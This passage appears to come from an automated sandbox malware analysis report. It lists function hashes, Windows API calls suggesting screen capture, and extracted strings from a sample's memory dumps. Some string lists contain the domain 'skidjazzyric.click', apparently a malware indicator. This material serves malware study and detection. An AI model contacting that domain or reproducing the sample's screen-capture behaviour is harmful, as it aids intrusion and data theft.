                                                                            • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                            • Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                            • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: ~|$SP$if$L|$pv$tj$vt
                                                                            • API String ID: 3664257935-3766828755
                                                                            • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                            • Instruction ID: 2d3a707c0b27a37d080a8dca2ea823689390cd00f3b1e49d8ab3b1a0f1300ead
                                                                            • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                            • Instruction Fuzzy Hash: F6622870604350AFE724CF28CC8172BB7E6EFC5314F18862CE996A72A1D779AC458F56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5&'d$O$~$L|
                                                                            • API String ID: 0-1549181410
                                                                            • Opcode ID: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
                                                                            • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                            • Opcode Fuzzy Hash: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
                                                                            • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                            • API String ID: 237503144-816972838
                                                                            • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                            • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                            • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                            • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                            APIs
                                                                              • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                              • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                              • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                              • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                              • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                              • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                              • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                              • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                              • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                              • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                            • CoUninitialize.OLE32 ref: 0040D555
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                            • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                            • API String ID: 3213364925-1525209810
                                                                            • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                            • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                            • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                            • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                            APIs
                                                                              • Part of subcall function 00786BE7: GetDC.USER32(00000000), ref: 00786BF0
                                                                              • Part of subcall function 00786BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 00786C11
                                                                              • Part of subcall function 00786BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 00786C21
                                                                              • Part of subcall function 00786BE7: DeleteObject.GDI32(00000000), ref: 00786C28
                                                                              • Part of subcall function 00786BE7: CreateCompatibleDC.GDI32(00000000), ref: 00786C37
                                                                              • Part of subcall function 00786BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00786C42
                                                                              • Part of subcall function 00786BE7: SelectObject.GDI32(00000000,00000000), ref: 00786C4E
                                                                              • Part of subcall function 00786BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00786C71
                                                                            • CoUninitialize.COMBASE ref: 0075D7BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                            • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                            • API String ID: 3248263802-1525209810
                                                                            • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                            • Instruction ID: 4fae7a7e415dc922d68f452e76c35a4a9287f692000f901faf197a081bf759f7
                                                                            • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                            • Instruction Fuzzy Hash: ABB115756047818BE725CF2AC4E07A2FBE2FF96301B18C1ACC4D64BB46D778A846CB51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                            • API String ID: 0-102253164
                                                                            • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                            • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                            • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                            • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                            • API String ID: 0-102253164
                                                                            • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                            • Instruction ID: 7c49f69f3ecc732ed00c3e1a93cbe8155668dd0e6b0bedec53f6a0cb29026315
                                                                            • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                            • Instruction Fuzzy Hash: 3F322AB19003118BCB25CF25C892776B7B2FF95314F28929CDC866F795E779A802CB91
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00758B0B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00758B15
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00758BBC
                                                                            • GetForegroundWindow.USER32 ref: 00758BD1
                                                                            • ExitProcess.KERNEL32 ref: 00758D1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                            • String ID: 6W01
                                                                            • API String ID: 4063528623-326071965
                                                                            • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                            • Instruction ID: 77dab1fa099c5139e4b6b66ccedab5b8134606975e55d9eaef80e8a55ca92181
                                                                            • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                            • Instruction Fuzzy Hash: 85519D73A403044BD368AF648C4A396BAC79BC5310F1BC1399D45AB3E6EDB88C0987D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                            • API String ID: 0-74227037
                                                                            • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                            • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                            • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                            • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                            • API String ID: 0-3030200349
                                                                            • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                            • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                            • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                            • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$8<j?$D$4b
                                                                            • API String ID: 0-1320392364
                                                                            • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                            • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                            • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                            • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$8<j?$D$4b
                                                                            • API String ID: 0-1320392364
                                                                            • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                            • Instruction ID: 5dde6cb511b20b0140cb557857fda5e5f0c118eafb454aed94682378e072bf5a
                                                                            • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                            • Instruction Fuzzy Hash: 3F91E6602183818BDB18CF3989A137AFBD19FD6354F28C9ADE4DA8B391D27DC505C716
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 'P0V$,D,J$9HiN$WT
                                                                            • API String ID: 0-3770969982
                                                                            • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                            • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                            • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                            • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: D`a&$NMNO$bX_^$L|
                                                                            • API String ID: 2994545307-3883628086
                                                                            • Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                            • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                            • Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                            • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 'P0V$,D,J$9HiN$WT
                                                                            • API String ID: 0-3770969982
                                                                            • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                            • Instruction ID: 9ef1e3ffc7b546dfe7b7fa0a9fabb6735f0d50984ea969047b6e7cfcb50eebfb
                                                                            • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                            • Instruction Fuzzy Hash: 8771C0B554D3958BD304DF12C8802AFBBE2FBD1314F188E2CF5D95B252C73A854A8B86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: B:$C@$K3$bX_^
                                                                            • API String ID: 0-595269213
                                                                            • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                            • Instruction ID: 14d5595e0901be5b3705631931933cf0a1f7d4256074b44b63b4bb7d548f7866
                                                                            • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                            • Instruction Fuzzy Hash: 2C41C1B5D102289BDB20DF79CD467DDBFB1AB45300F4441EAE448A7355D6740E498FD2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NP,?$L|$UA
                                                                            • API String ID: 0-4020875018
                                                                            • Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                            • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                            • Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                            • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: {wBy$?;;$L|
                                                                            • API String ID: 0-3668801880
                                                                            • Opcode ID: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
                                                                            • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                            • Opcode Fuzzy Hash: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
                                                                            • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8<j?$D$4b
                                                                            • API String ID: 0-2390459867
                                                                            • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                            • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                            • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                            • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8<j?$D$4b
                                                                            • API String ID: 0-2390459867
                                                                            • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                            • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                            • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                            • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8<j?$D$4b
                                                                            • API String ID: 0-2390459867
                                                                            • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                            • Instruction ID: 48680262b148167fba268f1a7d77e7d64efc6b472a3bec2acb0e7e1371f6867c
                                                                            • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                            • Instruction Fuzzy Hash: 4D81F76021C3818BDB19CF3989A137AFBD19FD6354F28C9ADE4D68B281D27DC506C716
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8<j?$D$4b
                                                                            • API String ID: 0-2390459867
                                                                            • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                            • Instruction ID: 23857d40c701dabdb08d12a692afbcd8c9529f26c588be138499360d4ecb3cff
                                                                            • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                            • Instruction Fuzzy Hash: BA81E86021C3818BDB19CF3985A137AFBD19FD6354F28C9ADE4D68B281D27DC506C716
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #=0$Z$ut
                                                                            • API String ID: 0-1971374411
                                                                            • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                            • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                            • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                            • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #=0$Z$ut
                                                                            • API String ID: 0-1971374411
                                                                            • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                            • Instruction ID: 7939f3a25bfe45263c593dc2e8af4e62b138a628fa92b74292986856862cfd0e
                                                                            • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                            • Instruction Fuzzy Hash: C681043110C3828AD7058F38C4507ABFFE1AFA3315F1889ADD5D29B682D669C90AC752
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8<j?$D$4b
                                                                            • API String ID: 0-2390459867
                                                                            • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                            • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                            • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                            • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8<j?$D$4b
                                                                            • API String ID: 0-2390459867
                                                                            • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                            • Instruction ID: d060f5939d3702de43fa25e7731bccebbdf724d7befd67365575c2c19d8e003b
                                                                            • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                            • Instruction Fuzzy Hash: 5F81E8612183818BD719CF3989A137AFFD19FE6354F2C89ADE4D58B281D23DC50ACB16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D`a&$NMNO$L|
                                                                            • API String ID: 0-2467171573
                                                                            • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                            • Instruction ID: 9c7546e4d7313edbd06b0c8d86d51d6eb7434f66615900691a38556886e39e4e
                                                                            • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                            • Instruction Fuzzy Hash: A98137312087055FDB14DF28EC81A6BB7A3EFC5324F29C62CE5A54B391DB39AD0A8751
                                                                            Strings
                                                                            Memory Dump Source
